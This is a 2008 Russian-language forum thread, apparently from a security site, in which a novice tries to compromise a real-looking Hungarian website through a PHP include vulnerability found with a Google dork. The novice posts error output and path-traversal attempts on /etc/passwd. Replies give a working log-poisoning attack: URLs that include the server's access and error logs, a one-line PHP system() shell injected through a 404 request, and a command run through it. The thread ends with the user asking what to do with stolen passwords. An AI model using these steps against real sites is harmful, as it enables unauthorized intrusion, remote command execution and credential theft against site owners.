Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 След.
RSS
проблема с PHP include
 
Всем привет!Люди,вот у меня такой вот к вам вопрос на счёт PHP include уязвимости.Вот появилось такое желание найти дырявый сайт с PHP уязвимостью,иду в гугль,и пишу там inurl:index.php?page=*.php.Нашел дырявый сайт,пробую,там был вот что то наподобее
этого:
http://examplesite.hu/eng/index.php?page=

Ну я пробую,сделал так:

http://examplesite.hu/eng/index.php?page=dsdsds

Всё получилось,начал ругаться,выдал мне это:

Warning: include(/var/www/www.examplesite.hu/eng/page/dsdsds.php) [function.include]: failed to open stream: No such file or directory in /var/www/www.examlesite.hu/eng/index.php on line 131

Warning: include() [function.include]: Failed opening '/var/www/www.examPlesite.hu/eng/page/dsdsds.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/www.examplesite.hu/eng/index.php on line 131

Ну заливаю я шелл на свою хомпагу на народе,потом всё как обычно,подставляю свой адрес с путём к шеллу,то есть после page=Мой адресс.

А он всё равно даж после этого выдаёт мне:

Warning: include(/var/www/www.examplesite.hu/eng/page/dsdsds.php) [function.include]: failed to open stream: No such file or directory in /var/www/www.examplesite.hu/eng/index.php on line 131

Warning: include() [function.include]: Failed opening '/var/www/www.examplesite.hu/eng/page/dsdsds.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/www.examplesite.hu/eng/index.php on line 131

И шелл что то не заливаеться и ничё не происходит.
Обьясните мне,чайнику в PHP include,что я не правильно делаю,или как поступить после того как я нашел уязвимость.Буду рад любой информации,заранее спасибо :)
Изменено: redbu11 - 20.09.2008 18:50:45
 
Обратите внимание на слова:
Цитата
redbu11 пишет:
No such file or directory in /var/www/www.examplesite.hu/eng/index.php on line 131
Переведите и подумайте что они могут значить
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
И что тогда я могу в этом случае делать?Чем я могу воспользоваться чтоб залить шелл? :?: Плиз помогите
 
Если мне пишет что нет никакого такого файла в той директории,то как мне можно залить на уязвимый сайт шелл?Помогите плиз,обьясните мне как новичку в PHP include,что я могу или должен делать,плиз,буду очень благодарен за любую информацию.
 
Первое, что вам стоит сделать - понять в чём суть проблемы. Лишь тогда вы сможете её решить. Переведите те строчки о которых я говорил - тогда вы будете ближе к пониманию проблемы. Попытайтесь использовать свои мозги, а не бежать за помощью сразу, как возникает непонятная ситуация
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Подсказка: вы пытаетесь подключить файл с удалённого ресурса, а вам сообщают, что этого самого файла (при чём файл выглядит как полная ссылка на него) нет в директории уязвимого сайта. Теперь подумайте: что это означает?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Shanker,я хорошо подумал на счёт того что ты мне сказал,ну вот если мне пишут,что такого файла нет в уязвимом сайте,ну значит ето тоже признак уязвимости что можно подключить к нему файл с другого ресурса,но Shanker,пожалуйста я так и не смог понять что можно сделать в этом случае,подскажи новичку в этом деле что можно сделать,пожалуйста. :(
 
Даю правильный ответ на мою предыдущую подсказку: функция инклудинга файлов в скрипте может инклудить только локальные файлы. Именно поэтому ссылка на удалённый ресурс (типа: http://www.site.ru) рассматривается уязвимым скриптом именно как файл с именем "http://www.site.ru" в каталоге, где расположен уязвимый сервер. А раз скрипт не находит такого файла - то он и выдаёт такую ошибку.
Теперь, прочитав это, попробуйте сами понять что можно получить от уязвимого скрипта
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
инклуд локальный ишите способ залить файл на сервер (аватары на форумах например ) ну через или логи :-)
НО ИМХО бросте это не благадарное занятие.
ЗЫ Нет скрипт киди на секлабе
Изменено: ZER0 - 22.09.2008 10:43:18
 
Кстати да: через логи - это хорошая мысль! Но вряд ли он сможет её осилить ;)

Цитата
ZER0   пишет:
ЗЫ Нет скрипт киди на секлабе
Поддерживаю! Ату всех на античат или хакер.ру
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Спасибо вам за инфу огромное,я понял некоторые вещи для себя которые не мог понять,спасибо ZERO и Shanker вам большое!А да,и если вам не жалко,вы не могли бы мне рассказать как это можно сделать через логи?Заранее спасибо за любую информацию!
 
А вот ещё,я пробую ставить ../../../../../etc/passwd после page= и выдаёт мне это:

Warning: include() [function.include]: open_basedir restriction in effect. File(/var/www/www.ctravel.hu/eng/page/../../../../../etc/passwd.php) is not within the allowed path(s): (/var/www/www.ctravel.hu/) in /var/www/www.ctravel.hu/eng/index.php on line 131

Warning: include(/var/www/www.ctravel.hu/eng/page/../../../../../etc/passwd.php) [function.include]: failed to open stream: Operation not permitted in /var/www/www.ctravel.hu/eng/index.php on line 131

Warning: include() [function.include]: Failed opening '/var/www/www.ctravel.hu/eng/page/../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/www.ctravel.hu/eng/index.php on line 131

Мол,Warning: include () [function.include]: ограничение open_basedir в действительности. Файл (/var/www/www.ctravel.hu/eng/page/../../../../../etc/passwd.php) не в пределах правильного пути (ей): (/var/www/www.ctravel.hu/) в/var/www/www.ctravel.hu/eng/index.php на линии 131

Обьясните чайнику в чём дело,или если кто знает хорошую статью,FAQ,или ещё что нить про PHP include,плиз,дайте ссылки откуда можно нормально прочитать про это.Заранее спасибо
 
redbu11,
Идея в следующем: создать запись с простейшим php-шеллом в логах доступа (access.log или error.log) сайта. А потом приинклудить этот файл. Таким образом, файл с лдогами будет содержать php-команду, уоторая успешно выполнится. Только надо быть очень аккуратным: запись с php-командами должна встречаться в логах 1 раз. В противном случае результат непредсказуем.
Вопрос: как записать код в файл лога? Очень просто! Надо в браузере набрать по шаблону:
http://www.site.ru/index.php<php_code&gt;

Основную суть я рассказал. Дальше думайте сами. Даже где-то статью видел по этому поводу. Лень искать...

Думаю, вряд ли кто-то будет разжёвывать больше, чем я сейчас написал. А если хочется хакнуть хоть что-нибудь (скорее всего, так и есть и вам совсем не знания нужны в области ИБ), то лучше найти более уязвимый сайт. Это совсем не сложно: их очень много дырявых, с удалённой инъекцией php кода
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Shanker,респект тебе и огромное спасибо,я многое узнал для себя.Ты мне очень помог.Дело не в том что мне хочеться хакнуть что нибудь по быстрее,просто я только начал с PHP include,и многое не знаю об этом,а ты мне реально помог,ещё раз тебе большое спасибо! :)
 
Shanker,мне как то неудобно тебя об этом просить,ведь ты мне и так много чего рассказал,но,если ты конечно можешь или если не сложно,я был бы очень рад если ты смог бы дать ту статью которую ты говорил тебе лень искать,конечно если ты хочешь,мне это очень на пользу,любая информация об этом мне будет очень интерестно.
 
ИМХО сначала попробуй в через includ подключить логи
например так
_http://examplesite.hu/eng/index.php?page=../../../../../../../var/log/httpd/error.log
_http://examplesite.hu/eng/index.php?page=../../../../../../../var/log/httpd/acces.log

потом анализируй что пишется в лог и составляй такой запрос чтобы в лог попала запись с php шелом например если в error log пишет ся все ошибки 404 то можно сделать так
_http://examplesite.hu/eng/bla/<?system(@$_GET["cmd"]) ?>
а потом подключить логи с кодом шела и выполнить команду :)
_http://examplesite.hu/eng/index.php?page=../../../../../../../var/log/httpd/error.log&cmd=ls -lia

ЗЫ не плохая статья на ачате http://forum.antichat.ru/thread67095-php+include.html
Изменено: ZER0 - 25.09.2008 11:42:53
 
Thanks!Zero,спасибо тебе,я очень много чего понял,и за статью спасибо,очень интерестно и на пользу было почитать такую статью.Кстати,вот на сколько я знаю,есть локальный и внешний инклуд.Вот в локальеом можно только просматривать данные с сервера,а во внешнем,сразу можно прописать путь к шеллу и выполнить его.А можно как нибудь погуглить чтоб найти внешний PHP инклуд?Заранее спасибо. :)
 
Кстати,как посоветуете,кодить свой веб-шелл или пользоваться уже готовым?Я вот лично своим веб шеллом пользуюсь,но просто хотел спросить,как вы бы посоветовали.
 
Цитата
redbu11 пишет:
А можно как нибудь погуглить чтоб найти внешний PHP инклуд?
Вряд ли...

Цитата
redbu11 пишет:
Я вот лично своим веб шеллом пользуюсь,но просто хотел спросить,как вы бы посоветовали.
Если твой шелл умеет обходить всякие ограничения PHP (запрет вызова всяких небезопасных функций. Забыл как это называется... хоть убей :) ) То почему бы своё творение не использовать? Хотя вряд ли у тебя такой навороченый шелл :)
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Shanker,а вот если я прочитав директорию etc/passwd достал пароли,то что с ними делать?
Страницы: 1 2 След.
Читают тему